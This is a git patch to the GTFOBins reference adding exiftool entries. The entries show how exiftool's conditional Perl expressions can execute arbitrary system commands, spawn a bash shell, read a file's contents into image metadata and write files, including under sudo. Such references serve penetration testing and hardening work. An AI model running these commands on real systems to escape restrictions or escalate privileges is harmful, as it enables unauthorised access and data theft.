From dd497c2190b18b7296d6e9cf2ad9bded0fbe4564 Mon Sep 17 00:00:00 2001
From: Alexey Zhuchkov <zer0divisi1@gmail.com>
Date: Sat, 1 Feb 2025 13:46:40 +0300
Subject: [PATCH] Add more exiftool commands

---
 _gtfobins/exiftool.md | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)

diff --git a/_gtfobins/exiftool.md b/_gtfobins/exiftool.md
index 6dfa379c..69725f4b 100644
--- a/_gtfobins/exiftool.md
+++ b/_gtfobins/exiftool.md
@@ -8,14 +8,38 @@ functions:
         OUTPUT=output_file
         exiftool -filename=$OUTPUT $LFILE
         cat $OUTPUT
+    - description: Exfiltrate file data via metadata tags
+      code: |
+        LFILE=file_read
+        INPUT=input_file
+        exiftool "-description<=$LFILE" --filename $INPUT
   file-write:
     - code: |
         LFILE=file_to_write
         INPUT=input_file
         exiftool -filename=$LFILE $INPUT
+    - description: Write file from metadata tag's content
+      code: |
+        LFILE=file_to_write
+        INPUT=input_file
+        exiftool -description -W $LFILE --filename $INPUT
   sudo:
     - code: |
         LFILE=file_to_write
         INPUT=input_file
         sudo exiftool -filename=$LFILE $INPUT
+  command:
+    - code: |
+        COMMAND=command_to_execute
+        INPUT=input_file
+        exiftool -if "system('$COMMAND');1" --filename $INPUT
+    - description: Run system command and exfiltrate result via metadata tags
+      code: |
+        COMMAND=command_to_execute
+        INPUT=input_file
+        exiftool -userparam "inj=Test" -if "\$\$self{OPTIONS}{UserParam}{inj}=\`$COMMAND\`;1" '-description<$inj' --filename $INPUT
+  shell:
+    - code: |
+      INPUT=input_file
+      exiftool -if "system('bash')" $INPUT
 ---